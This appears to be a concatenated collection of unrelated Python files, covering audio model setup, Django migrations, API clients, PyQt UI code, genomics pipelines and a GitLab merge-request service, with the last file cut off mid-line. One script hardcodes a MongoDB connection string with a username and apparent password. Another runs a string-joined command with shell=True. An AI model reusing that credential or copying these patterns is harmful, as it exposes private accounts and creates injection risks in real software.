    parser = argparse.ArgumentParser()
    parser.add_argument('--g_pretrained_ckpt', type=str, default=None)
    parser.add_argument('--test_files', type=str, nargs='+', default=None)
    parser.add_argument('--h5', action='store_true', default=False)
    parser.add_argument('--seed', type=int, default=111,
                        help="Random seed (Def: 111).")
    parser.add_argument('--synthesis_path', type=str, default='segan_samples',
                        help='Path to save output samples (Def: segan_samples).')
    parser.add_argument('--cuda', action='store_true', default=False)
    parser.add_argument('--soundfile', action='store_true', default=False)
    parser.add_argument('--cfg_file', type=str, default=None)
    opts = parser.parse_args()

    if not os.path.exists(opts.synthesis_path):
        os.makedirs(opts.synthesis_path)

    # seed initialization
    random.seed(opts.seed)
    np.random.seed(opts.seed)
    torch.manual_seed(opts.seed)
    if opts.cuda:
        torch.cuda.manual_seed_all(opts.seed)

    main(opts)
# ---------------------------------------------------------------------------
# Generated by Django 3.1.4 on 2021-04-22 11:31

from django.db import migrations
import modelcluster.fields


class Migration(migrations.Migration):

    dependencies = [
        ('menus', '0009_wagtaillanguage'),
        ('flex', '0017_auto_20210328_2141'),
    ]

    operations = [
        migrations.AddField(
            model_name='flexpage',
            name='translations',
            field=modelcluster.fields.ParentalManyToManyField(blank=True, to='menus.WagtailLanguage'),
        ),
        migrations.AddField(
            model_name='formpage',
            name='translations',
            field=modelcluster.fields.ParentalManyToManyField(blank=True, to='menus.WagtailLanguage'),
        ),
        migrations.AddField(
            model_name='infopage',
            name='translations',
            field=modelcluster.fields.ParentalManyToManyField(blank=True, to='menus.WagtailLanguage'),
        ),
    ]
# ---------------------------------------------------------------------------
# repo: idarlenearaujo/URI_Python, file: 1006.py

# read three floats
A = float(input())
B = float(input())
C = float(input())

# weights
P1 = 2
P2 = 3
P3 = 5

# weighted average
MEDIA = ((A * P1) + (B * P2) + (C * P3)) / (P1 + P2 + P3)

print('MEDIA = {:.1f}'.format(MEDIA))
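# A worked instance of the weighted mean above, with made-up grades:
# (5.0*2 + 6.0*3 + 7.0*5) / (2+3+5) = (10 + 18 + 35) / 10 = 6.3
assert ((5.0 * 2) + (6.0 * 3) + (7.0 * 5)) / (2 + 3 + 5) == 6.3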
# ---------------------------------------------------------------------------
#!/usr/bin/env python3
#
# Search metadata in the EDAN API
# v0.1
#

import urllib.parse
import urllib.request
import datetime
import email.utils
import uuid
import hashlib
import json
from base64 import b64encode

#for testing
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError


def queryEDAN(edan_q, url, AppID, AppKey):
    """
    Execute the query
    """
    #Date of request
    dt = datetime.datetime.now()
    RequestDate = email.utils.format_datetime(dt)
    #Generated uniquely for this request
    Nonce = str(uuid.uuid4()).replace('-', '')
    #This will be the value of X-AuthContent, each element is joined by a single newline
    StringToSign = "{}\n{}\n{}\n{}".format(Nonce, edan_q, RequestDate, AppKey)
    #First hash using SHA1
    HashedString = hashlib.sha1(StringToSign.encode('utf-8')).hexdigest()
    #Base64 encode
    EncodedString = b64encode(HashedString.encode('utf-8')).decode('utf-8')
    #Set headers
    headers = {'X-AppId': AppID,
               'X-Nonce': Nonce,
               'X-RequestDate': RequestDate,
               'X-AuthContent': EncodedString}
    #Make request
    req = urllib.request.Request(url=url, headers=headers, method="GET")
    try:
        response = urlopen(req)
    except HTTPError as e:
        print('The server couldn\'t fulfill the request.')
        print('Error: {} ({})'.format(e.reason, e.code))
        return False
    except URLError as e:
        print('We failed to reach a server.')
        print('Reason: ', e.reason)
        return False
    else:
        data = response.read().decode('utf-8')
        return json.loads(data)


def searchEDAN(edan_query, AppID, AppKey, rows=10, start=0):
    """
    Search EDAN
    """
    #Request
    edan_query = urllib.parse.quote_plus(edan_query)
    edan_q = "q={}&rows={}&start={}&facet=true".format(edan_query, rows, start)
    #Put whole thing together
    url = 'https://edan.si.edu/metadata/v2.0/collections/search.htm?{}'.format(edan_q)
    #Execute query
    result = queryEDAN(edan_q, url, AppID, AppKey)
    return result


def getContentEDAN(edan_id, AppID, AppKey):
    """
    Get details from an item using an EDAN ID
    """
    #Request
    edan_q = "url={}".format(edan_id)
    #Put whole thing together
    url = 'https://edan.si.edu/content/v2.0/content/getContent.htm?{}'.format(edan_q)
    #Execute query
    result = queryEDAN(edan_q, url, AppID, AppKey)
    return result
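# A hedged usage sketch: the credentials below are placeholders (real ones
# come from the Smithsonian EDAN program), and reading a 'rows' list reflects
# the usual shape of EDAN search responses:
if __name__ == '__main__':
    APP_ID = 'MY_APP_ID'      # hypothetical
    APP_KEY = 'MY_APP_KEY'    # hypothetical
    results = searchEDAN('aardvark', APP_ID, APP_KEY, rows=5)
    if results:
        for row in results.get('rows', []):
            print(row.get('title'))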
# ---------------------------------------------------------------------------
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'areaDialog.ui' # # Created by: PyQt5 UI code generator 5.13.0 from PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.QtGui import QIcon class Ui_areaDialog(object): def setupUi(self, areaDialog): areaDialog.setObjectName("areaDialog") areaDialog.setWindowIcon(QIcon('camera.png')) areaDialog.resize(280, 160) self.verticalLayout = QtWidgets.QVBoxLayout(areaDialog) self.verticalLayout.setObjectName("verticalLayout") self.horizontalLayout = QtWidgets.QHBoxLayout() self.horizontalLayout.setObjectName("horizontalLayout") self.label = QtWidgets.QLabel(areaDialog) font = QtGui.QFont() font.setPointSize(11) self.label.setFont(font) self.label.setObjectName("label") self.horizontalLayout.addWidget(self.label) spacerItem = QtWidgets.QSpacerItem(298, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout.addItem(spacerItem) self.verticalLayout.addLayout(self.horizontalLayout) self.horizontalLayout_2 = QtWidgets.QHBoxLayout() self.horizontalLayout_2.setObjectName("horizontalLayout_2") self.areaLineEdit = QtWidgets.QLineEdit(areaDialog) self.areaLineEdit.setEnabled(True) font = QtGui.QFont() font.setPointSize(11) self.areaLineEdit.setFont(font) self.areaLineEdit.setAlignment(QtCore.Qt.AlignCenter) self.areaLineEdit.setReadOnly(True) self.areaLineEdit.setObjectName("areaLineEdit") self.horizontalLayout_2.addWidget(self.areaLineEdit) self.label_2 = QtWidgets.QLabel(areaDialog) font = QtGui.QFont() font.setPointSize(11) self.label_2.setFont(font) self.label_2.setTextFormat(QtCore.Qt.RichText) self.label_2.setObjectName("label_2") self.horizontalLayout_2.addWidget(self.label_2) self.verticalLayout.addLayout(self.horizontalLayout_2) self.horizontalLayout_3 = QtWidgets.QHBoxLayout() self.horizontalLayout_3.setObjectName("horizontalLayout_3") spacerItem1 = QtWidgets.QSpacerItem(153, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout_3.addItem(spacerItem1) self.areaOKButton = QtWidgets.QPushButton(areaDialog) self.areaOKButton.setObjectName("areaOKButton") self.horizontalLayout_3.addWidget(self.areaOKButton) spacerItem2 = QtWidgets.QSpacerItem(153, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout_3.addItem(spacerItem2) self.verticalLayout.addLayout(self.horizontalLayout_3) self.retranslateUi(areaDialog) QtCore.QMetaObject.connectSlotsByName(areaDialog) def retranslateUi(self, areaDialog): _translate = QtCore.QCoreApplication.translate areaDialog.setWindowTitle(_translate("areaDialog", "Area")) self.label.setText(_translate("areaDialog", "The area is:")) self.areaLineEdit.setText(_translate("areaDialog", "12345")) self.label_2.setText(_translate("areaDialog", "<html><head/><body><p>m<span style=\" vertical-align:super;\">2</span></p></body></html>")) self.areaOKButton.setText(_translate("areaDialog", "OK"))
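# A minimal sketch of the standard PyQt5 pattern for driving a generated Ui_*
# class like the one above (not part of the generated file):
if __name__ == '__main__':
    import sys
    app = QtWidgets.QApplication(sys.argv)
    dialog = QtWidgets.QDialog()
    ui = Ui_areaDialog()
    ui.setupUi(dialog)               # builds the widgets onto the dialog
    ui.areaLineEdit.setText("42")    # read-only for the user, not for code
    ui.areaOKButton.clicked.connect(dialog.accept)
    dialog.show()
    sys.exit(app.exec_())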
# ---------------------------------------------------------------------------
# repo: rochester-rcl/islandora-import-scripts

# work in progress - this creates a skeletal MODS file for the given set of files

from xml.etree.ElementTree import ElementTree

# NOTE: getFileList, itemDirectory and xmlOutputDir are expected to be
# defined elsewhere in this work-in-progress script.

templateFile = "C:\\python-scripts\\xml-file-output\\aids_skeletalmods.xml"


def createXmlFiles(idList):
    print("create xml file list")
    for id in idList:
        #print("processing id " + id )
        tree = ElementTree()
        tree.parse(templateFile)
        root = tree.getroot()

        nameElement = tree.find('titleInfo/title')
        nameElement.text = id

        apElement = tree.find('identifier')
        apElement.text = id

        root.attrib = {"xmlns:xlink": "http://www.w3.org/1999/xlink",
                       "xmlns:xsi": "http://www.w3.org/2001/XMLSchema-instance",
                       "xmlns": "http://www.loc.gov/mods/v3",
                       "version": "3.5",
                       "xsi:schemaLocation": "http://www.loc.gov/mods/v3 http://www.loc.gov/standards/mods/v3/mods-3-5.xsd"}

        #print("writing file " + xmlOutputDir + id + ".xml")
        tree.write(xmlOutputDir + id + ".xml")


def processSets(offset, maxFilesToProcess):
    fileIdList = getFileList(itemDirectory, "tif")
    setSize = len(fileIdList)

    if (not maxFilesToProcess):
        maxFilesToProcess = setSize + 1
    if (not offset):
        offset = 0

    offset = int(offset)
    maxFilesToProcess = int(maxFilesToProcess)
    setSize = int(setSize)

    print("Max files to process = " + str(maxFilesToProcess))
    print("Offset = " + str(offset))

    counter = 1
    totalBytes = 0
    fileSet = []
    startCount = 1

    for fileName, fileSize in fileIdList.items():
        if ((counter >= offset) and (counter <= maxFilesToProcess)):
            print("counter = " + str(counter) + " processing file " + fileName + " with size " + str(fileSize))
            nextFile = fileName
            fileSet.append(fileName)
        counter = counter + 1

    if (len(fileSet) > 0):
        createXmlFiles(fileSet)


# maxFilesPerZip = input("Please enter maximum number of files per zip file: ")
maxFilesToProcess = input("Please enter maximum number of files to process enter to process all: ")
offset = input("Please enter the offset position (inclusive) press enter to start from the beginning: ")

processSets(offset, maxFilesToProcess)
# ---------------------------------------------------------------------------
# file: assignments/api/admin/serializers.py

# restframework imports
from rest_framework import serializers
# django imports
from django.contrib.auth import get_user_model
# Local Imports
from assignments.models import (
    Assignment,
    AssignmentFile,
)
from courses.models import (
    Course,
    CourseSection,
)

User = get_user_model()


class AssignmentCreateSerializer(serializers.ModelSerializer):
    course = serializers.PrimaryKeyRelatedField(
        queryset=Course.objects.all(),
        required=True
    )
    name = serializers.CharField(required=True)
    description = serializers.CharField(required=True)
    index = serializers.IntegerField(required=True)
    is_active = serializers.BooleanField(required=False)

    class Meta:
        model = Assignment
        fields = [
            'course',
            'course_section',
            'name',
            'description',
            'index',
            'is_active',
        ]


class AssignmentUpdateSerializer(serializers.ModelSerializer):

    class Meta:
        model = Assignment
        fields = [
            'course',
            'course_section',
            'name',
            'description',
            'index',
            'is_active',
        ]


class AssignmentFileCreateSerializer(serializers.ModelSerializer):
    assignment = serializers.PrimaryKeyRelatedField(
        queryset=Assignment.objects.all(),
        required=True
    )
    name = serializers.CharField(required=True)
    file = serializers.FileField(
        allow_empty_file=False,
        max_length=2048
    )
    description = serializers.CharField(required=True)
    index = serializers.IntegerField(required=True)
    is_active = serializers.BooleanField(required=False)

    class Meta:
        model = AssignmentFile
        fields = [
            'assignment',
            'name',
            'file',
            'description',
            'index',
            'is_active',
        ]


class AssignmentFileUpdateSerializer(serializers.ModelSerializer):

    class Meta:
        model = AssignmentFile
        fields = [
            'assignment',
            'name',
            'file',
            'description',
            'index',
            'is_active',
        ]
# ---------------------------------------------------------------------------
# file: 1-100/5/5.py
# Project Euler 5: smallest positive number evenly divisible by all of 1..20
i = 1
for k in range(1, 21):
    if i % k > 0:
        for j in range(1, 21):
            if (i * j) % k == 0:
                i *= j
                break
print(i)
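# The loop above patches i until every k in 1..20 divides it; the same answer
# drops out of a least-common-multiple fold, shown here as a cross-check:
from math import gcd
from functools import reduce

lcm = reduce(lambda a, b: a * b // gcd(a, b), range(1, 21), 1)
print(lcm)  # 232792560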
# ---------------------------------------------------------------------------
import pymongo

from sqls.config import *


def findUsers():
    import mysql.connector
    cxn = mysql.connector.connect(
        host=databaseConfig.get('hostname'),
        user=databaseConfig.get('username'),
        passwd=databaseConfig.get('password'),
        db=databaseConfig.get('database')
    )
    cursor = cxn.cursor()
    sql = "SELECT * FROM User"
    cursor.execute(sql)
    res = list(cursor.fetchall())
    print(res)
    return res


if __name__ == '__main__':
    myclient = pymongo.MongoClient("mongodb+srv://Sean:wHHf6APYXRCzSozP@<EMAIL>.<EMAIL>.mongodb.net/test?retryWrites=true&w=majority")
    mydb = myclient["test"]
    mycol = mydb["user"]
    x = mycol.find_one()
    x['_id'] = str(x['_id'])
    print(x)
    findUsers()
# ---------------------------------------------------------------------------
#!python3
# repo: COVID-IWG/epimargin-studies

from pathlib import Path
from io import StringIO

import numpy as np
import pandas as pd
import requests


def import_and_clean_cases(save_path: Path) -> pd.DataFrame:
    '''
    Import and clean case data from covidtracking.com.
    '''
    # Parameters for filtering raw df
    kept_columns = ['date', 'state', 'positive', 'death']
    excluded_areas = set(['PR', 'MP', 'AS', 'GU', 'VI'])

    # Import and save result
    res = requests.get("https://covidtracking.com/api/v1/states/daily.json")
    df = pd.read_json(res.text)
    df.to_csv(save_path/"covidtracking_cases.csv", index=False)

    # Exclude specific territories and features
    df = df[~df['state'].isin(excluded_areas)][kept_columns]

    # Format date properly
    df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'], format='%Y%m%d')

    # Calculate state change in positives/deaths
    df = df.sort_values(['state', 'date'])
    df['delta_positive'] = df.groupby(['state'])['positive'].transform(lambda x: x.diff())
    df['delta_death'] = df.groupby(['state'])['death'].transform(lambda x: x.diff())
    return df


def get_adaptive_estimates(path: Path) -> pd.DataFrame:
    # Parameters for filtering raw df
    kept_columns = ['date', 'state', 'RR_pred', 'RR_CI_lower', 'RR_CI_upper', 'T_pred',
                    'T_CI_lower', 'T_CI_upper', 'new_cases_ts', 'anamoly']

    # Import and subset columns
    df = pd.read_csv(path/"adaptive_estimates.csv")
    df = df[kept_columns]

    # Format date properly and return
    df.loc[:, 'date'] = pd.to_datetime(df['date'], format='%Y-%m-%d')
    return df


def get_new_rt_live_estimates(path: Path) -> pd.DataFrame:
    # Parameters for filtering raw df
    kept_columns = ['date', 'region', 'mean', 'lower_80', 'upper_80',
                    'infections', 'test_adjusted_positive']

    # Import and save as csv
    res = requests.get("https://d14wlfuexuxgcm.cloudfront.net/covid/rt.csv")
    df = pd.read_csv(StringIO(res.text))
    df.to_csv(path/"rtlive_new_estimates.csv", index=False)

    # Filter to just necessary features
    df = df[kept_columns]

    # Format date properly and rename columns
    df.loc[:, 'date'] = pd.to_datetime(df['date'], format='%Y-%m-%d')
    df.rename(columns={'region': 'state', 'mean': 'RR_pred_rtlivenew',
                       'lower_80': 'RR_lower_rtlivenew',
                       'upper_80': 'RR_upper_rtlivenew',
                       'test_adjusted_positive': 'adj_positive_rtlivenew',
                       'infections': 'infections_rtlivenew'}, inplace=True)
    return df


def get_old_rt_live_estimates(path: Path) -> pd.DataFrame:
    # Parameters for filtering raw df
    kept_columns = ['date', 'state', 'mean', 'lower_95', 'upper_95']

    # Import and save as csv
    df = pd.read_csv(path/"rtlive_old_estimates.csv")

    # Filter to just necessary features
    df = df[kept_columns]

    # Format date properly and rename columns
    df.loc[:, 'date'] = pd.to_datetime(df['date'], format='%Y-%m-%d')
    df.rename(columns={'region': 'state', 'mean': 'RR_pred_rtliveold',
                       'lower_95': 'RR_lower_rtliveold',
                       'upper_95': 'RR_upper_rtliveold'}, inplace=True)
    return df


def get_cori_estimates(path: Path) -> pd.DataFrame:
    # Import and save as csv
    df = pd.read_csv(path/"cori_estimates.csv")

    # Format date properly and rename columns
    df.loc[:, 'date'] = pd.to_datetime(df['date'], format='%Y-%m-%d')
    return df


def get_luis_estimates(path: Path) -> pd.DataFrame:
    # Import and save as csv
    df = pd.read_csv(path/"luis_code_estimates.csv")

    # Format date properly and rename columns
    df.loc[:, 'date'] = pd.to_datetime(df['date'], format='%Y-%m-%d')
    return df
# ---------------------------------------------------------------------------
# repo: jfcoz/azure-cli
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------

from knack.util import CLIError


def validate_database_args(namespace):
    if namespace.hot_cache_period:
        hot_cache_period_in_days = round_hot_cache_to_days(namespace.hot_cache_period)
        if hot_cache_period_in_days < 0:
            raise CLIError('hot_cache_period must be a valid time')
    if namespace.soft_delete_period:
        soft_delete_period_in_days = round_soft_delete_to_days(namespace.soft_delete_period)
        if soft_delete_period_in_days < 0:
            raise CLIError('soft_delete_period must be a valid time')


def validate_cluster_args(namespace):
    max_name_length = 22
    name_length = len(namespace.cluster_name)
    if name_length > max_name_length:
        raise CLIError('name cannot be longer than ' + str(max_name_length) + " letters")


def round_hot_cache_to_days(time):
    return round_timedelta_to_days(time, 'hot_cache_period')


def round_soft_delete_to_days(time):
    return round_timedelta_to_days(time, 'soft_delete_period')


def round_timedelta_to_days(time, parameter_name):
    # durations arrive as 'd:hh:mm:ss'; any partial day rounds up
    try:
        splitted = time.split(":")
        numberOfDays = int(splitted[0])
        if int(splitted[1]) > 0:
            numberOfDays += 1
        return numberOfDays
    except (AttributeError, ValueError, IndexError):
        raise CLIError(parameter_name + ' must be a valid time format')
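# Quick checks of the day-rounding helper above, using the d:hh:mm:ss duration
# form it expects (values are illustrative):
assert round_hot_cache_to_days('3:04:00:00') == 4    # 3 days 4 hours rounds up
assert round_soft_delete_to_days('2:00:00:00') == 2  # exact days stay as-is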
# ---------------------------------------------------------------------------
from subprocess import check_output import sys,os,argparse from StaticPath import StaticPath, Separators from time import ctime from SequencingFormats import BAM parser = argparse.ArgumentParser(description=''' ************************************************************************************************ Basic description: Call mutation from tumor and normal bam ************************************************************************************************ Usage instructions: 1. if starts from fq then required arguments include: --normal_fq1 --normal_fq2 --normal_sample_id --tumor_fq1 --tumor_fq2 --tumor_sample_id 2. if starts from bam then required arguments include: --normal_bam --tumor_bam --normal_sample_id --tumor_sample_id ''', formatter_class=argparse.RawTextHelpFormatter ) parser.add_argument('--StartsFromBam', default=False, action='store_true') parser.add_argument('--normal_fq1') parser.add_argument('--normal_fq2') parser.add_argument('--tumor_fq1') parser.add_argument('--tumor_fq2') parser.add_argument('--normal_sample_id') parser.add_argument('--tumor_sample_id') parser.add_argument('--normal_bam') parser.add_argument('--tumor_bam') parser.add_argument('--out_dir', default='./outfiles') args = parser.parse_args() #get the path of two sequencing file FromBam = args.StartsFromBam normal_fq1_path = args.normal_fq1 normal_fq2_path = args.normal_fq2 tumor_fq1_path = args.tumor_fq1 tumor_fq2_path = args.tumor_fq2 normal_sample_id = args.normal_sample_id tumor_sample_id = args.tumor_sample_id output_dir = args.out_dir normal_bam_path = args.normal_bam tumor_bam_path = args.tumor_bam if not (normal_sample_id and tumor_sample_id): print('please specify both tumor and normal id') sys.exit(1) ''' step1 preprocess tumor and normal bam ''' if FromBam: #if starts from bam if not (normal_bam_path and tumor_bam_path): print('please specify --tumor_bam and --normal_bam ') sys.exit(1) print("started preprocess from bams at", ctime()) # preprocess the normal bam normal_out = check_output([sys.executable, "WXS_preprocess.py", "--StartsFromBam", '--bam', normal_bam_path, "--output_dir", output_dir, "--sample_id", normal_sample_id], encoding="UTF-8") normal_bam_path = normal_out.split('\n')[-2] # build the normal bam object normal_bam = BAM(normal_bam_path) # preprocess the tumor bam tunor_out = check_output([sys.executable, "WXS_preprocess.py", "--StartsFromBam", '--bam', tumor_bam_path, "--output_dir", output_dir, "--sample_id", tumor_sample_id], encoding="UTF-8") tumor_bam_path = tunor_out.split('\n')[-2] # #build the tumor bam object tumor_bam = BAM(tumor_bam_path) else: if not (normal_fq1_path and normal_fq2_path and tumor_fq1_path and tumor_fq2_path): print('please specify --normal_fq1 and --normal_fq2 and tumor_fq1 and tumor_fq2') sys.exit(1) print("started preprocess from fastq at", ctime()) # preprocess the normal bam normal_out = check_output([sys.executable, "WXS_preprocess.py", "--fq1", normal_fq1_path, "--fq2", normal_fq2_path, "--output_dir", output_dir, "--sample_id", normal_sample_id], encoding="UTF-8") normal_bam_path = normal_out.split('\n')[-2] # build the normal bam object normal_bam = BAM(normal_bam_path) # preprocess the tumor bam tunor_out = check_output([sys.executable, "WXS_preprocess.py", "--fq1", tumor_fq1_path, "--fq2", tumor_fq2_path, "--output_dir", output_dir, "--sample_id", tumor_sample_id], encoding="UTF-8") tumor_bam_path = tunor_out.split('\n')[-2] # #build the tumor bam object tumor_bam = BAM(tumor_bam_path) #call mutations based on normal bam and tumor bam 
from subprocess import CalledProcessError,run from GenomeReference import GenomeReference from tools import checkout_dir def call_mutation(tumor_bam, normal_bam, out_dir): #get sample id sample_id = normal_bam.fetch_sample_id() vcf_dir = os.path.join(out_dir, 'vcf') checkout_dir(vcf_dir) case_mutation_vsf = os.path.join(vcf_dir, sample_id+Separators.sample_name_separator+'somatic.vcf') cmd = " ".join(['gatk', 'Mutect2', '-R', GenomeReference.get_reference_fasta(), '-I', tumor_bam.get_path(), '-I', normal_bam.get_path(), '-normal', sample_id, '--germline-resource', StaticPath.germline_file, '--panel-of-normals', StaticPath.pon, '-O', case_mutation_vsf]) try: run([cmd], shell=True, check=True) except CalledProcessError as e: print(e) return case_mutation_vsf call_mutation(tumor_bam, normal_bam, out_dir=output_dir) ''' used for debug ''' # #get the path of tumor and normal fastqs # normal_fq1_path = os.path.join(StaticPath.base_dir, 'FASTQs', 'normal1.fq') # normal_fq2_path = os.path.join(StaticPath.base_dir, 'FASTQs', 'normal2.fq') # tumor_fq1_path = os.path.join(StaticPath.base_dir, 'FASTQs', 'tumor1.fq') # tumor_fq2_path = os.path.join(StaticPath.base_dir, 'FASTQs', 'tumor2.fq') # tumor_sample_id = "TARGET-30-PALHVD-01A-01W" # normal_sample_id = "TARGET-30-PALHVD-10A-01W" #build the normal bam object # normal_bam = BAM(os.path.join(StaticPath.base_dir, 'out_files', # normal_sample_id,'bams', normal_sample_id+'.sorted.merged.markdup.bqsr.bam')) # tumor_bam = BAM(os.path.join(StaticPath.base_dir, 'out_files', tumor_sample_id, # 'bams',tumor_sample_id+'.sorted.merged.markdup.bqsr.bam'))
StarcoderdataPython
1649264
from __future__ import absolute_import from future import standard_library standard_library.install_aliases() from builtins import input from builtins import str from .BaseService import BaseService import json import sys #required from urllib.parse import urljoin from urllib.parse import quote import requests class GitLabService(BaseService): SERVICE_NAME = "gitlab" def _API(self): url = 'https://%s/' % self.origin_domain path = 'api/v4/' return urljoin(str(url), str(path)) def parent_branch_exists(self, token): url_path = 'projects/%s/repository/branches/%s' % (self._url_encoded_path(), self.parent_branch) url = self._API() + url_path try: res = requests.get( url, headers={"PRIVATE-TOKEN": token} ) except Exception as e: self.logger.fatal(e) sys.exit() if res.status_code == 404: return False return True def issue_pull_request(self, obj): try: merge_message = obj['message'] api_token = obj['api_token'] except KeyError: self.logger.fatal("GitLabService::issue_pull_request has incorrect parameters @%s" % obj) sys.exit() params = { 'source_branch': self.source_branch, 'target_branch': self.parent_branch, 'title': merge_message } path = 'projects/%s/merge_requests' % self._url_encoded_path() url = urljoin(str(self._API()), str(path)) headers = {"PRIVATE-TOKEN": api_token} res = {} try: res = requests.post( url, headers=headers, data=params ) except Exception as e: self.logger.fatal(e) sys.exit() json_response = json.loads(res.text) if res.status_code == 401: # Invalid credentials. Revoke token and start over. return (None, res.status_code) elif res.status_code >= 400: try: err_msg = str(json_response['message'][0]) except: err_msg = '' return ("Could not create merge request %s" % (err_msg), res.status_code) elif res.status_code == 201: try: pr_href = json_response["web_url"] except: pr_href = "Merge request succeeded, but no URL was returned." return (pr_href, None) else: return (json_response, None) def _url_encoded_path(self): # https://docs.gitlab.com/ce/api/README.html#namespaced-path-encoding return quote('%s/%s' % (self.namespace, self.project), safe='') def _setup_token(self): self.logger.warn("\n\n(One Time Setup) Please create a Personal Access Token") self.logger.warn("https://%s/profile/personal_access_tokens" % self.origin_domain) self.logger.warn("Scope: API, Expires: Never\n") token = input("Please enter your Personal Access Token: ") # Make request to resource that requires us to be authenticated path = 'projects/%s/labels' % self._url_encoded_path() url = urljoin(str(self._API()), path) res = requests.get( url, headers={"PRIVATE-TOKEN": token} ) if res.status_code == 200: return(token, None) return(-1, "Invalid Personal Access Token")
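# Usage sketch (not part of the original source). It assumes BaseService's
# constructor populates origin_domain, namespace, project, source_branch and
# parent_branch; "<token>" is a placeholder for a real Personal Access Token:
#
# service = GitLabService(...)  # constructor arguments come from BaseService
# if service.parent_branch_exists("<token>"):
#     href, err = service.issue_pull_request(
#         {"message": "Merge feature branch", "api_token": "<token>"})
#     print(href if err is None else err)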
StarcoderdataPython
1798581
''' Created on Oct 11, 2011 @author: jklo ''' from contextlib import closing from functools import wraps from ijson.parse import items from lr.lib.signing import reloadGPGConfig from pylons import config from uuid import uuid1 from LRSignature.sign.Sign import Sign_0_21 import base64 import copy import couchdb import gnupg import ijson import json import logging import os import shutil import tempfile import time import urllib, urlparse, oauth2, socket, uuid import urllib2 log = logging.getLogger(__name__) class SetFlowControl(object): def __init__(self,enabled,serviceDoc,doc_limit=100,id_limit=100): server = couchdb.Server(config['couchdb.url.dbadmin']) self.nodeDb = server[config['couchdb.db.node']] self.enabled = enabled self.serviceDoc = serviceDoc self.doc_limit=doc_limit self.id_limit=id_limit def __call__(self,f): @wraps(f) def set_flow_control(obj, *args, **kw): serviceDoc = self.nodeDb[self.serviceDoc] service_data = copy.deepcopy(serviceDoc['service_data']) serviceDoc['service_data']['flow_control'] = self.enabled serviceDoc['service_data']['doc_limit'] = self.doc_limit serviceDoc['service_data']['id_limit'] = self.id_limit self.nodeDb[self.serviceDoc] = serviceDoc try: return f(obj, *args, **kw) finally: serviceDoc['service_data'] = service_data self.nodeDb[self.serviceDoc] = serviceDoc return set_flow_control class ModifiedServiceDoc(object): def __init__(self, service_doc_id, update=None): server = couchdb.Server(config['couchdb.url.dbadmin']) self.nodeDb = server[config['couchdb.db.node']] self.service_doc_id = service_doc_id self.update_fn = update def __call__(self,f): @wraps(f) def wrapped(*args, **kw): orig_serviceDoc = self.nodeDb[self.service_doc_id] copy_serviceDoc = copy.deepcopy(orig_serviceDoc) if self.update_fn: copy_serviceDoc =self.update_fn(copy_serviceDoc) self.nodeDb[self.service_doc_id] = copy_serviceDoc try: return f(*args, **kw) finally: orig_serviceDoc["_rev"] = self.nodeDb[self.service_doc_id]["_rev"] self.nodeDb[self.service_doc_id] = orig_serviceDoc return wrapped def update_authz(basicauth=False, oauth=False): def update(orig): orig["service_auth"] = orig["service_auth"] or { } orig["service_auth"]["service_authz"] = [] if basicauth == True: orig["service_auth"]["service_authz"].append("basicauth") if oauth == True: orig["service_auth"]["service_authz"].append("oauth") if len(orig["service_auth"]["service_authz"]) == 0: orig["service_auth"]["service_authz"].append("none") return orig return update def ForceCouchDBIndexing(): json_headers = {"Content-Type": "application/json"} couch = { "url": config["couchdb.url"], "resource_data": config["couchdb.db.resourcedata"] } def indexTestData(obj): opts = { "startkey":"_design/", "endkey": "_design0", "include_docs": True } design_docs = obj.db.view('_all_docs', **opts) for row in design_docs: if "views" in row.doc and len(row.doc["views"].keys()) > 0: for view in row.doc["views"].keys(): # view = row.doc["views"].keys()[0] view_name = "{0}/_view/{1}".format( row.key, view) index_opts = { "limit": 1, "descending": 'true'} if "reduce" in row.doc["views"][view]: index_opts["reduce"] = 'false' # log.debug("Indexing: {0}".format( view_name)) req = urllib2.Request("{url}/{resource_data}/{view}?{opts}".format(view=view_name, opts=urllib.urlencode(index_opts), **couch), headers=json_headers) try: res = urllib2.urlopen(req) except Exception, e: log.info("Problem indexing: %s", req) # view_result = obj.db.view(view_name, **index_opts) # log.error("Indexed: {0}, got back: {1}".format(view_name, json.dumps(res.read()))) 
else: pass#log.error("Not Indexing: {0}".format( row.key)) def test_decorator(fn): def test_decorated(self, *args, **kw): try: #print "Wrapper Before...." indexTestData(self) return fn(self, *args, **kw) except : raise finally: indexTestData(self) #print "Wrapper After...." return test_decorated return test_decorator def PublishTestDocs(sourceData, prefix, sleep=0, force_index=True): json_headers = {"Content-Type": "application/json"} test_data_log = "test-data-%s.log" % prefix couch = { "url": config["couchdb.url"], "resource_data": config["couchdb.db.resourcedata"] } @ModifiedServiceDoc(config['lr.publish.docid'], update_authz()) def writeTestData(obj, **kw): try: key = kw["pgp_keys"][0] signer = Sign_0_21(privateKeyID=key["fingerprint"], passphrase=key["passphrase"], gnupgHome=kw["gnupghome"], gpgbin=kw["gpgbin"], publicKeyLocations=key["locations"]) except: signer = None if not hasattr(obj, "test_data_ids"): obj.test_data_ids = {} obj.test_data_ids[prefix] = [] with open(test_data_log, "w") as plog: for doc in sourceData: if "doc_ID" not in doc: doc["doc_ID"] = prefix+str(uuid1()) try: doc = signer.sign(doc) except: pass obj.app.post('/publish', params=json.dumps({"documents": [ doc ]}), headers=json_headers) plog.write(doc["doc_ID"] + os.linesep) obj.test_data_ids[prefix].append(doc["doc_ID"]) if sleep > 0: time.sleep(sleep) kw["test_data_ids"] = obj.test_data_ids[prefix] return kw def indexTestData(obj): if force_index == False: return opts = { "startkey":"_design/", "endkey": "_design0", "include_docs": True } design_docs = obj.db.view('_all_docs', **opts) for row in design_docs: if "views" in row.doc and len(row.doc["views"].keys()) > 0: for view in row.doc["views"].keys(): # view = row.doc["views"].keys()[0] view_name = "{0}/_view/{1}".format( row.key, view) index_opts = { "limit": 1, "descending": 'true'} if "reduce" in row.doc["views"][view]: index_opts["reduce"] = 'false' # log.error("Indexing: {0}".format( view_name)) req = 